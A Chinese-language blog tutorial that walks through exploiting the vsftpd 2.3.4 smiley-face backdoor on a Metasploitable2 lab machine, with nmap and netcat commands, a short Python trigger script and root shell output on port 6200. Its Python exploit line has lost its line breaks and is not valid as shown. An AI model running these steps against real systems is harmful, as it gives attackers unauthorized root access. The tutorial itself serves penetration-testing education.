Kali渗透测试-远程控制:6200端口变成“后门”


测试环境

攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248)

靶机:Metasploitable2 - Linux (IP:192.168.68.205)

攻击工具:Netcat(nc) “瑞士军刀”

扫描工具:Nmap version 7.92

漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200端口打开一个连接,从而通过这个连接失效对目标主机的控制。关于“笑脸漏洞”大家可以自行搜索一下相关信息。

测试步骤

1. 攻击上运行nmap扫描

┌──(kali㉿kali)-[~]
└─$ nmap --script ftp-vsftpd-backdoor 192.168.68.205

2. Netcat 扫描端口测试连接

以靶机80端口为例测试,命令如下:

┌──(kali㉿kali)-[~]
└─$ nc -v 192.168.68.205 80
192.168.68.205: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.68.205] 80 (http) open

可以看到这个端口状态为open, 也就是开放的。接下来试一下可否通过80端口控制目标, 命令如下:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 80

测试完成之后,系统会暂时没有反应。再输入一条Linux操作系统用于现实用户名称的whoami命令,以此来查看是否能通过80端口来控制目标,如下图所示:

虽然出现了如上提示,但这只是Metasploittable2的欢迎界面,尝试失败。

3. 激活笑脸漏洞,开启6200端口

分享一段注入脚本代码,如下:

import socket
from ftplib import FTP
host_ip = '192.168.68.205'
ftp = FTP()
backdoorstr = 'hello:)'
backdoorpass = "it's me"
try:ftp.connect(host_ip, 21, timeout = 2)ftp.login(backdoorstr, backdoorpass)
except:print('完成笑脸注入')

先运行注入脚本,如上图所示,注入成功。然后运行如下命令:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 6200

运行结果如下图:

虽然只显示了一个光标,但是对Netcat表示已经成功连接了。

4. 输入测试命令

输入如下命令,得到回应–root

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 6200                                                                                              1 ⨯
whoami
root

以root身份登录,然后输入其他测试命令,如“ls”、 “cd”、 “pwd”也都成功,如下图所示:

通过如上测试,可以看到6200端口上运行的vsftd-2.3.4。当用户名中存在“:)”两个连续的符号时,就会激活vsf_sysutil_extra函数,这个函数会在本地建立一个socket,然后绑定到6200端口,之后调用exec函数绑定/bin/sh。

Kali渗透测试-远程控制:6200端口变成“后门”相关推荐

  1. Kali渗透测试:通过Web应用程序实现远程控制

    Kali渗透测试:通过Web应用程序实现远程控制 ​ 我们所接触的PHP.JSP这样的语言主要是用来开发Web应用程序的,但其实他们的功能十分强大,也可以实现远程控制的功能.我们经常听说的" ...

  2. Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹

    Kali渗透测试:远程控制被控端免杀及DLL生成.注入反弹 ​ 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的 ...

  3. Kali渗透测试:使用Armitage针对漏洞进行攻击

    Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例("永恒之蓝")经典的漏洞,单击这个模块以后就可以开始攻击了. 实 验 环 境 ...

  4. 渗透测试中常用端口及利用

    渗透测试中常用端口及利用 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆 ...

  5. 渗透测试中的端口利用

    渗透测试中的端口利用 我们在进行渗透测试中,一般情况下会对端口进行扫描,看看服务器中开启了哪些端口,对应的端口一般存在对应的服务,而这些服务可能存在相应的漏洞,下面就是简单结束一下端口对应服务,服务可 ...

  6. 学习Kali渗透测试笔记

    Kali渗透测试 一.什么是渗透测试 1. 软件测试 2. 安全测试与渗透测试 3.渗透测试 二.渗透测试的目标 1. 网络硬件设备 2. 主机操作系统 3. 应用系统 4. 数据库系统 三.渗透测试 ...

  7. Kali渗透测试:使用 Armitage生成被控端和主控端

    Kali渗透测试:使用 Armitage生成被控端和主控端 Armitage就是一款使用Java为Metasploit编写的有图形化操作界面的软件,通过它可以轻松的使用Metasploit对目标进行攻 ...

  8. Kali渗透测试:使用browser_autopwn2模块进行渗透攻击

    Kali渗透测试:使用browser_autopwn2模块进行渗透攻击 如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块.这种攻击的思路是渗透者构造一个攻击用的Web服 ...

  9. kali渗透测试系列---信息收集

    kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...

最新文章

  1. python中文件读写位置的作用-文件操作,读,写,指定位置
  2. 34.16.159(zz)
  3. python基础教程:操作符
  4. java对xml文件的解析_Java对XML文件的解析
  5. [总结]DataGrid 固定表头实现(纵向和横向滚动条滚动,而Header不动)
  6. asp.net web常用控件FileUpload(文件上传控件)
  7. Storm ack和fail机制再论
  8. 不同图像锐化算子提取的图像信息有哪些不同_传统图像处理
  9. C++ - extern C用法浅析
  10. ubuntu增加磁盘容量
  11. 快速排序中pivot的选取策略
  12. 系统架构师 项目经理 哪个更有前景_OLED和QLED电视有什么区别?哪个更好更有前景?...
  13. 学习用PS美化软件界面
  14. exynos 4412 电源管理芯片PMIC 的配置及使用方法
  15. 数据的准确性对模型效果的重要性
  16. STM32延时函数的四种方法
  17. 如何解读测试结果出现负数
  18. VS调用大恒相机sdk实时显示图像并进行图像处理+OPENCV
  19. mplayer全参数
  20. C语言数据结构代码——有向图

热门文章

  1. 智慧灯杆网关的单灯控制与边缘计算功能
  2. 【​观察】探索中小企业SaaS定制化之路 解读搭搭云三大“颠覆式”创新
  3. 2022年信息安全工程师考试知识点:嵌入式系统安全
  4. 网络工程师华为专项配置
  5. 计算机控制电缆芯数,控制电缆芯数怎么选择
  6. 盘点十大国内外热门的SaaS点评平台
  7. 解决内存泄漏更加清楚的认识到Java匿名类与外部类的关系
  8. 工具BlueSoleil千月蓝牙破解版,最好的蓝牙驱动
  9. 【117期分享】教学说课PPT模板免费下载
  10. 《精通软件性能测试与LoadRunner最佳实战》—第2章2.节